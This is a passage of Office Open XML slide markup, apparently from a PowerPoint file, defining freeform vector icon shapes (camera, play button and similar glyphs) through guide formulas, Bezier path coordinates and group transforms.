                  <a:gd name="T5" fmla="*/ 13 h 77"/>
                  <a:gd name="T6" fmla="*/ 0 w 77"/>
                  <a:gd name="T7" fmla="*/ 64 h 77"/>
                  <a:gd name="T8" fmla="*/ 13 w 77"/>
                  <a:gd name="T9" fmla="*/ 77 h 77"/>
                  <a:gd name="T10" fmla="*/ 64 w 77"/>
                  <a:gd name="T11" fmla="*/ 77 h 77"/>
                  <a:gd name="T12" fmla="*/ 77 w 77"/>
                  <a:gd name="T13" fmla="*/ 64 h 77"/>
                  <a:gd name="T14" fmla="*/ 77 w 77"/>
                  <a:gd name="T15" fmla="*/ 13 h 77"/>
                  <a:gd name="T16" fmla="*/ 64 w 77"/>
                  <a:gd name="T17" fmla="*/ 0 h 77"/>
                  <a:gd name="T18" fmla="*/ 25 w 77"/>
                  <a:gd name="T19" fmla="*/ 34 h 77"/>
                  <a:gd name="T20" fmla="*/ 52 w 77"/>
                  <a:gd name="T21" fmla="*/ 34 h 77"/>
                  <a:gd name="T22" fmla="*/ 53 w 77"/>
                  <a:gd name="T23" fmla="*/ 38 h 77"/>
                  <a:gd name="T24" fmla="*/ 39 w 77"/>
                  <a:gd name="T25" fmla="*/ 53 h 77"/>
                  <a:gd name="T26" fmla="*/ 24 w 77"/>
                  <a:gd name="T27" fmla="*/ 38 h 77"/>
                  <a:gd name="T28" fmla="*/ 25 w 77"/>
                  <a:gd name="T29" fmla="*/ 34 h 77"/>
                  <a:gd name="T30" fmla="*/ 67 w 77"/>
                  <a:gd name="T31" fmla="*/ 33 h 77"/>
                  <a:gd name="T32" fmla="*/ 67 w 77"/>
                  <a:gd name="T33" fmla="*/ 53 h 77"/>
                  <a:gd name="T34" fmla="*/ 67 w 77"/>
                  <a:gd name="T35" fmla="*/ 62 h 77"/>
                  <a:gd name="T36" fmla="*/ 63 w 77"/>
                  <a:gd name="T37" fmla="*/ 67 h 77"/>
                  <a:gd name="T38" fmla="*/ 15 w 77"/>
                  <a:gd name="T39" fmla="*/ 67 h 77"/>
                  <a:gd name="T40" fmla="*/ 10 w 77"/>
                  <a:gd name="T41" fmla="*/ 63 h 77"/>
                  <a:gd name="T42" fmla="*/ 10 w 77"/>
                  <a:gd name="T43" fmla="*/ 53 h 77"/>
                  <a:gd name="T44" fmla="*/ 10 w 77"/>
                  <a:gd name="T45" fmla="*/ 34 h 77"/>
                  <a:gd name="T46" fmla="*/ 10 w 77"/>
                  <a:gd name="T47" fmla="*/ 34 h 77"/>
                  <a:gd name="T48" fmla="*/ 17 w 77"/>
                  <a:gd name="T49" fmla="*/ 34 h 77"/>
                  <a:gd name="T50" fmla="*/ 17 w 77"/>
                  <a:gd name="T51" fmla="*/ 39 h 77"/>
                  <a:gd name="T52" fmla="*/ 39 w 77"/>
                  <a:gd name="T53" fmla="*/ 60 h 77"/>
                  <a:gd name="T54" fmla="*/ 60 w 77"/>
                  <a:gd name="T55" fmla="*/ 38 h 77"/>
                  <a:gd name="T56" fmla="*/ 60 w 77"/>
                  <a:gd name="T57" fmla="*/ 33 h 77"/>
                  <a:gd name="T58" fmla="*/ 67 w 77"/>
                  <a:gd name="T59" fmla="*/ 33 h 77"/>
                  <a:gd name="T60" fmla="*/ 67 w 77"/>
                  <a:gd name="T61" fmla="*/ 17 h 77"/>
                  <a:gd name="T62" fmla="*/ 65 w 77"/>
                  <a:gd name="T63" fmla="*/ 19 h 77"/>
                  <a:gd name="T64" fmla="*/ 60 w 77"/>
                  <a:gd name="T65" fmla="*/ 19 h 77"/>
                  <a:gd name="T66" fmla="*/ 58 w 77"/>
                  <a:gd name="T67" fmla="*/ 17 h 77"/>
                  <a:gd name="T68" fmla="*/ 58 w 77"/>
                  <a:gd name="T69" fmla="*/ 12 h 77"/>
                  <a:gd name="T70" fmla="*/ 60 w 77"/>
                  <a:gd name="T71" fmla="*/ 10 h 77"/>
                  <a:gd name="T72" fmla="*/ 65 w 77"/>
                  <a:gd name="T73" fmla="*/ 10 h 77"/>
                  <a:gd name="T74" fmla="*/ 67 w 77"/>
                  <a:gd name="T75" fmla="*/ 12 h 77"/>
                  <a:gd name="T76" fmla="*/ 67 w 77"/>
                  <a:gd name="T77" fmla="*/ 1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" h="77">
                    <a:moveTo>
                      <a:pt x="6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" y="71"/>
                      <a:pt x="6" y="77"/>
                      <a:pt x="13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71" y="76"/>
                      <a:pt x="77" y="71"/>
                      <a:pt x="77" y="64"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="77" y="13"/>
                      <a:pt x="77" y="13"/>
                      <a:pt x="77" y="13"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="77" y="6"/>
                      <a:pt x="71" y="0"/>
                      <a:pt x="64" y="0"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="25" y="34"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="52" y="34"/>
                      <a:pt x="52" y="34"/>
                      <a:pt x="52" y="34"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="53" y="35"/>
                      <a:pt x="53" y="37"/>
                      <a:pt x="53" y="38"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="53" y="46"/>
                      <a:pt x="47" y="53"/>
                      <a:pt x="39" y="53"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="31" y="53"/>
                      <a:pt x="24" y="47"/>
                      <a:pt x="24" y="38"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="24" y="37"/>
                      <a:pt x="24" y="35"/>
                      <a:pt x="25" y="34"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="67" y="33"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="67" y="53"/>
                      <a:pt x="67" y="53"/>
                      <a:pt x="67" y="53"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="67" y="62"/>
                      <a:pt x="67" y="62"/>
                      <a:pt x="67" y="62"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="67" y="65"/>
                      <a:pt x="65" y="67"/>
                      <a:pt x="63" y="67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2" y="67"/>
                      <a:pt x="10" y="65"/>
                      <a:pt x="10" y="6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7" y="35"/>
                      <a:pt x="17" y="37"/>
                      <a:pt x="17" y="39"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="17" y="51"/>
                      <a:pt x="27" y="60"/>
                      <a:pt x="39" y="60"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="51" y="60"/>
                      <a:pt x="60" y="50"/>
                      <a:pt x="60" y="38"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="60" y="37"/>
                      <a:pt x="60" y="35"/>
                      <a:pt x="60" y="33"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="67" y="33"/>
                      <a:pt x="67" y="33"/>
                      <a:pt x="67" y="33"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="67" y="17"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="67" y="18"/>
                      <a:pt x="66" y="19"/>
                      <a:pt x="65" y="19"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="60" y="19"/>
                      <a:pt x="60" y="19"/>
                      <a:pt x="60" y="19"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="59" y="19"/>
                      <a:pt x="58" y="18"/>
                      <a:pt x="58" y="17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8" y="11"/>
                      <a:pt x="59" y="10"/>
                      <a:pt x="60" y="1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66" y="9"/>
                      <a:pt x="67" y="11"/>
                      <a:pt x="67" y="12"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="67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1" name="Freeform 181">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{265D3393-0D36-4B8E-8F69-EDBCB5C461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90869" y="1725991"/>
                <a:ext cx="252496" cy="191818"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 76 w 79"/>
                  <a:gd name="T1" fmla="*/ 3 h 60"/>
                  <a:gd name="T2" fmla="*/ 40 w 79"/>
                  <a:gd name="T3" fmla="*/ 0 h 60"/>
                  <a:gd name="T4" fmla="*/ 4 w 79"/>
                  <a:gd name="T5" fmla="*/ 3 h 60"/>
                  <a:gd name="T6" fmla="*/ 0 w 79"/>
                  <a:gd name="T7" fmla="*/ 30 h 60"/>
                  <a:gd name="T8" fmla="*/ 4 w 79"/>
                  <a:gd name="T9" fmla="*/ 57 h 60"/>
                  <a:gd name="T10" fmla="*/ 40 w 79"/>
                  <a:gd name="T11" fmla="*/ 60 h 60"/>
                  <a:gd name="T12" fmla="*/ 76 w 79"/>
                  <a:gd name="T13" fmla="*/ 57 h 60"/>
                  <a:gd name="T14" fmla="*/ 79 w 79"/>
                  <a:gd name="T15" fmla="*/ 30 h 60"/>
                  <a:gd name="T16" fmla="*/ 76 w 79"/>
                  <a:gd name="T17" fmla="*/ 3 h 60"/>
                  <a:gd name="T18" fmla="*/ 30 w 79"/>
                  <a:gd name="T19" fmla="*/ 45 h 60"/>
                  <a:gd name="T20" fmla="*/ 30 w 79"/>
                  <a:gd name="T21" fmla="*/ 15 h 60"/>
                  <a:gd name="T22" fmla="*/ 55 w 79"/>
                  <a:gd name="T23" fmla="*/ 30 h 60"/>
                  <a:gd name="T24" fmla="*/ 30 w 79"/>
                  <a:gd name="T25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9" h="60">
                    <a:moveTo>
                      <a:pt x="76" y="3"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="65" y="1"/>
                      <a:pt x="53" y="0"/>
                      <a:pt x="40" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="27" y="0"/>
                      <a:pt x="15" y="1"/>
                      <a:pt x="4" y="3"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2" y="11"/>
                      <a:pt x="0" y="20"/>
                      <a:pt x="0" y="30"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="40"/>
                      <a:pt x="2" y="49"/>
                      <a:pt x="4" y="57"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15" y="59"/>
                      <a:pt x="27" y="60"/>
                      <a:pt x="40" y="60"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="53" y="60"/>
                      <a:pt x="65" y="59"/>
                      <a:pt x="76" y="57"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="78" y="49"/>
                      <a:pt x="79" y="40"/>
                      <a:pt x="79" y="30"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="79" y="20"/>
                      <a:pt x="78" y="11"/>
                      <a:pt x="76" y="3"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="30" y="45"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="30" y="15"/>
                      <a:pt x="30" y="15"/>
                      <a:pt x="30" y="15"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="55" y="30"/>
                      <a:pt x="55" y="30"/>
                      <a:pt x="55" y="30"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="3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2" name="Freeform 183">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BF87635D-D704-488E-B2FF-D9BDA7E8CD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34459" y="2704655"/>
                <a:ext cx="219221" cy="217263"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 34 w 68"/>
                  <a:gd name="T1" fmla="*/ 0 h 68"/>
                  <a:gd name="T2" fmla="*/ 0 w 68"/>
                  <a:gd name="T3" fmla="*/ 34 h 68"/>
                  <a:gd name="T4" fmla="*/ 34 w 68"/>
                  <a:gd name="T5" fmla="*/ 68 h 68"/>
                  <a:gd name="T6" fmla="*/ 68 w 68"/>
                  <a:gd name="T7" fmla="*/ 34 h 68"/>
                  <a:gd name="T8" fmla="*/ 34 w 68"/>
                  <a:gd name="T9" fmla="*/ 0 h 68"/>
                  <a:gd name="T10" fmla="*/ 34 w 68"/>
                  <a:gd name="T11" fmla="*/ 61 h 68"/>
                  <a:gd name="T12" fmla="*/ 7 w 68"/>
                  <a:gd name="T13" fmla="*/ 34 h 68"/>
                  <a:gd name="T14" fmla="*/ 34 w 68"/>
                  <a:gd name="T15" fmla="*/ 6 h 68"/>
                  <a:gd name="T16" fmla="*/ 62 w 68"/>
                  <a:gd name="T17" fmla="*/ 34 h 68"/>
                  <a:gd name="T18" fmla="*/ 34 w 68"/>
                  <a:gd name="T19" fmla="*/ 61 h 68"/>
                  <a:gd name="T20" fmla="*/ 21 w 68"/>
                  <a:gd name="T21" fmla="*/ 21 h 68"/>
                  <a:gd name="T22" fmla="*/ 47 w 68"/>
                  <a:gd name="T23" fmla="*/ 21 h 68"/>
                  <a:gd name="T24" fmla="*/ 47 w 68"/>
                  <a:gd name="T25" fmla="*/ 46 h 68"/>
                  <a:gd name="T26" fmla="*/ 21 w 68"/>
                  <a:gd name="T27" fmla="*/ 46 h 68"/>
                  <a:gd name="T28" fmla="*/ 21 w 68"/>
                  <a:gd name="T29" fmla="*/ 2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68">
                    <a:moveTo>
                      <a:pt x="34" y="0"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="15" y="0"/>
                      <a:pt x="0" y="15"/>
                      <a:pt x="0" y="34"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="52"/>
                      <a:pt x="15" y="68"/>
                      <a:pt x="34" y="68"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="53" y="68"/>
                      <a:pt x="68" y="52"/>
                      <a:pt x="68" y="34"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="68" y="15"/>
                      <a:pt x="53" y="0"/>
                      <a:pt x="34" y="0"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="34" y="61"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="19" y="61"/>
                      <a:pt x="7" y="49"/>
                      <a:pt x="7" y="34"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="7" y="18"/>
                      <a:pt x="19" y="6"/>
                      <a:pt x="34" y="6"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="49" y="6"/>
                      <a:pt x="62" y="18"/>
                      <a:pt x="62" y="34"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="62" y="49"/>
                      <a:pt x="49" y="61"/>
                      <a:pt x="34" y="61"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="21" y="21"/>
                    </a:move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46"/>
                      <a:pt x="47" y="46"/>
                      <a:pt x="47" y="46"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="46"/>
                      <a:pt x="21" y="46"/>
                      <a:pt x="21" y="46"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="21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3" name="Freeform 188">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{84A23041-9B86-442A-87A8-C1411C8423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75015" y="3595239"/>
                <a:ext cx="229008" cy="230965"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 36 w 72"/>
                  <a:gd name="T1" fmla="*/ 0 h 72"/>
                  <a:gd name="T2" fmla="*/ 0 w 72"/>
                  <a:gd name="T3" fmla="*/ 36 h 72"/>
                  <a:gd name="T4" fmla="*/ 36 w 72"/>
                  <a:gd name="T5" fmla="*/ 72 h 72"/>
                  <a:gd name="T6" fmla="*/ 72 w 72"/>
                  <a:gd name="T7" fmla="*/ 36 h 72"/>
                  <a:gd name="T8" fmla="*/ 36 w 72"/>
                  <a:gd name="T9" fmla="*/ 0 h 72"/>
                  <a:gd name="T10" fmla="*/ 57 w 72"/>
                  <a:gd name="T11" fmla="*/ 31 h 72"/>
                  <a:gd name="T12" fmla="*/ 38 w 72"/>
                  <a:gd name="T13" fmla="*/ 59 h 72"/>
                  <a:gd name="T14" fmla="*/ 29 w 72"/>
                  <a:gd name="T15" fmla="*/ 55 h 72"/>
                  <a:gd name="T16" fmla="*/ 21 w 72"/>
                  <a:gd name="T17" fmla="*/ 33 h 72"/>
                  <a:gd name="T18" fmla="*/ 16 w 72"/>
                  <a:gd name="T19" fmla="*/ 35 h 72"/>
                  <a:gd name="T20" fmla="*/ 15 w 72"/>
                  <a:gd name="T21" fmla="*/ 32 h 72"/>
                  <a:gd name="T22" fmla="*/ 28 w 72"/>
                  <a:gd name="T23" fmla="*/ 23 h 72"/>
                  <a:gd name="T24" fmla="*/ 35 w 72"/>
                  <a:gd name="T25" fmla="*/ 37 h 72"/>
                  <a:gd name="T26" fmla="*/ 38 w 72"/>
                  <a:gd name="T27" fmla="*/ 46 h 72"/>
                  <a:gd name="T28" fmla="*/ 44 w 72"/>
                  <a:gd name="T29" fmla="*/ 38 h 72"/>
                  <a:gd name="T30" fmla="*/ 39 w 72"/>
                  <a:gd name="T31" fmla="*/ 32 h 72"/>
                  <a:gd name="T32" fmla="*/ 57 w 72"/>
                  <a:gd name="T33" fmla="*/ 3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cubicBezTo>
                      <a:pt x="16" y="0"/>
                      <a:pt x="0" y="17"/>
                      <a:pt x="0" y="36"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="56"/>
                      <a:pt x="16" y="72"/>
                      <a:pt x="36" y="72"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="56" y="72"/>
                      <a:pt x="72" y="56"/>
                      <a:pt x="72" y="36"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="72" y="17"/>
                      <a:pt x="56" y="0"/>
                      <a:pt x="36" y="0"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="57" y="31"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="55" y="45"/>
                      <a:pt x="42" y="56"/>
                      <a:pt x="38" y="59"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="34" y="61"/>
                      <a:pt x="30" y="58"/>
                      <a:pt x="29" y="55"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="27" y="52"/>
                      <a:pt x="22" y="35"/>
                      <a:pt x="21" y="33"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="20" y="32"/>
                      <a:pt x="16" y="35"/>
                      <a:pt x="16" y="35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2"/>
                      <a:pt x="22" y="24"/>
                      <a:pt x="28" y="23"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="33" y="22"/>
                      <a:pt x="33" y="32"/>
                      <a:pt x="35" y="37"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="36" y="43"/>
                      <a:pt x="37" y="46"/>
                      <a:pt x="38" y="46"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="39" y="46"/>
                      <a:pt x="42" y="43"/>
                      <a:pt x="44" y="38"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="47" y="34"/>
                      <a:pt x="44" y="29"/>
                      <a:pt x="39" y="32"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="41" y="21"/>
                      <a:pt x="60" y="18"/>
                      <a:pt x="57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176" name="Freeform 191">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E7EAD6AB-E4D7-479E-9B88-67137035B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2733" y="2886686"/>
                <a:ext cx="207477" cy="203562"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 62 w 65"/>
                  <a:gd name="T1" fmla="*/ 36 h 64"/>
                  <a:gd name="T2" fmla="*/ 62 w 65"/>
                  <a:gd name="T3" fmla="*/ 32 h 64"/>
                  <a:gd name="T4" fmla="*/ 33 w 65"/>
                  <a:gd name="T5" fmla="*/ 3 h 64"/>
                  <a:gd name="T6" fmla="*/ 28 w 65"/>
                  <a:gd name="T7" fmla="*/ 3 h 64"/>
                  <a:gd name="T8" fmla="*/ 18 w 65"/>
                  <a:gd name="T9" fmla="*/ 0 h 64"/>
                  <a:gd name="T10" fmla="*/ 0 w 65"/>
                  <a:gd name="T11" fmla="*/ 18 h 64"/>
                  <a:gd name="T12" fmla="*/ 3 w 65"/>
                  <a:gd name="T13" fmla="*/ 28 h 64"/>
                  <a:gd name="T14" fmla="*/ 3 w 65"/>
                  <a:gd name="T15" fmla="*/ 32 h 64"/>
                  <a:gd name="T16" fmla="*/ 33 w 65"/>
                  <a:gd name="T17" fmla="*/ 62 h 64"/>
                  <a:gd name="T18" fmla="*/ 38 w 65"/>
                  <a:gd name="T19" fmla="*/ 62 h 64"/>
                  <a:gd name="T20" fmla="*/ 47 w 65"/>
                  <a:gd name="T21" fmla="*/ 64 h 64"/>
                  <a:gd name="T22" fmla="*/ 65 w 65"/>
                  <a:gd name="T23" fmla="*/ 46 h 64"/>
                  <a:gd name="T24" fmla="*/ 62 w 65"/>
                  <a:gd name="T25" fmla="*/ 36 h 64"/>
                  <a:gd name="T26" fmla="*/ 35 w 65"/>
                  <a:gd name="T27" fmla="*/ 54 h 64"/>
                  <a:gd name="T28" fmla="*/ 17 w 65"/>
                  <a:gd name="T29" fmla="*/ 49 h 64"/>
                  <a:gd name="T30" fmla="*/ 18 w 65"/>
                  <a:gd name="T31" fmla="*/ 39 h 64"/>
                  <a:gd name="T32" fmla="*/ 26 w 65"/>
                  <a:gd name="T33" fmla="*/ 45 h 64"/>
                  <a:gd name="T34" fmla="*/ 40 w 65"/>
                  <a:gd name="T35" fmla="*/ 44 h 64"/>
                  <a:gd name="T36" fmla="*/ 32 w 65"/>
                  <a:gd name="T37" fmla="*/ 36 h 64"/>
                  <a:gd name="T38" fmla="*/ 15 w 65"/>
                  <a:gd name="T39" fmla="*/ 23 h 64"/>
                  <a:gd name="T40" fmla="*/ 28 w 65"/>
                  <a:gd name="T41" fmla="*/ 10 h 64"/>
                  <a:gd name="T42" fmla="*/ 46 w 65"/>
                  <a:gd name="T43" fmla="*/ 15 h 64"/>
                  <a:gd name="T44" fmla="*/ 45 w 65"/>
                  <a:gd name="T45" fmla="*/ 24 h 64"/>
                  <a:gd name="T46" fmla="*/ 32 w 65"/>
                  <a:gd name="T47" fmla="*/ 17 h 64"/>
                  <a:gd name="T48" fmla="*/ 29 w 65"/>
                  <a:gd name="T49" fmla="*/ 27 h 64"/>
                  <a:gd name="T50" fmla="*/ 50 w 65"/>
                  <a:gd name="T51" fmla="*/ 37 h 64"/>
                  <a:gd name="T52" fmla="*/ 35 w 65"/>
                  <a:gd name="T53" fmla="*/ 5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5" h="64">
                    <a:moveTo>
                      <a:pt x="62" y="36"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="62" y="35"/>
                      <a:pt x="62" y="34"/>
                      <a:pt x="62" y="32"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="62" y="16"/>
                      <a:pt x="49" y="3"/>
                      <a:pt x="33" y="3"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="31" y="3"/>
                      <a:pt x="29" y="3"/>
                      <a:pt x="28" y="3"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="25" y="1"/>
                      <a:pt x="22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1"/>
                      <a:pt x="1" y="25"/>
                      <a:pt x="3" y="28"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3" y="29"/>
                      <a:pt x="3" y="31"/>
                      <a:pt x="3" y="32"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3" y="49"/>
                      <a:pt x="16" y="62"/>
                      <a:pt x="33" y="62"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="34" y="62"/>
                      <a:pt x="36" y="62"/>
                      <a:pt x="38" y="62"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="41" y="63"/>
                      <a:pt x="44" y="64"/>
                      <a:pt x="47" y="64"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="57" y="64"/>
                      <a:pt x="65" y="56"/>
                      <a:pt x="65" y="46"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="65" y="43"/>
                      <a:pt x="64" y="39"/>
                      <a:pt x="62" y="36"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="35" y="54"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="26" y="55"/>
                      <a:pt x="21" y="53"/>
                      <a:pt x="17" y="49"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="13" y="45"/>
                      <a:pt x="15" y="40"/>
                      <a:pt x="18" y="39"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="22" y="39"/>
                      <a:pt x="24" y="44"/>
                      <a:pt x="26" y="45"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="28" y="46"/>
                      <a:pt x="36" y="49"/>
                      <a:pt x="40" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="44" y="39"/>
                      <a:pt x="37" y="37"/>
                      <a:pt x="32" y="36"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="24" y="35"/>
                      <a:pt x="14" y="31"/>
                      <a:pt x="15" y="23"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="16" y="15"/>
                      <a:pt x="22" y="11"/>
                      <a:pt x="28" y="10"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="9"/>
                      <a:pt x="42" y="11"/>
                      <a:pt x="46" y="15"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="51" y="19"/>
                      <a:pt x="48" y="24"/>
                      <a:pt x="45" y="24"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="42" y="24"/>
                      <a:pt x="39" y="17"/>
                      <a:pt x="32" y="17"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="25" y="17"/>
                      <a:pt x="20" y="24"/>
                      <a:pt x="29" y="27"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="29"/>
                      <a:pt x="47" y="30"/>
                      <a:pt x="50" y="37"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="53" y="45"/>
                      <a:pt x="45" y="54"/>
                      <a:pt x="35" y="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  <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="12" name="Group 9">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8E930CD3-C700-44C5-8F0F-D62FC23F08A9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="6880858" y="1289058"/>
              <a:ext cx="3916760" cy="4537746"/>
              <a:chOff x="6868614" y="762985"/>
              <a:chExt cx="5222153" cy="6050102"/>
            </a:xfrm>
            <a:grpFill/>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="17" name="Freeform 55">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C00135E9-4B39-4DB4-9D53-72DBCB02D2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38448" y="4076742"/>
                <a:ext cx="342533" cy="319044"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 53 w 107"/>
                  <a:gd name="T1" fmla="*/ 13 h 100"/>
                  <a:gd name="T2" fmla="*/ 37 w 107"/>
                  <a:gd name="T3" fmla="*/ 16 h 100"/>
                  <a:gd name="T4" fmla="*/ 24 w 107"/>
                  <a:gd name="T5" fmla="*/ 23 h 100"/>
                  <a:gd name="T6" fmla="*/ 13 w 107"/>
                  <a:gd name="T7" fmla="*/ 43 h 100"/>
                  <a:gd name="T8" fmla="*/ 17 w 107"/>
                  <a:gd name="T9" fmla="*/ 55 h 100"/>
                  <a:gd name="T10" fmla="*/ 27 w 107"/>
                  <a:gd name="T11" fmla="*/ 66 h 100"/>
                  <a:gd name="T12" fmla="*/ 33 w 107"/>
                  <a:gd name="T13" fmla="*/ 75 h 100"/>
                  <a:gd name="T14" fmla="*/ 33 w 107"/>
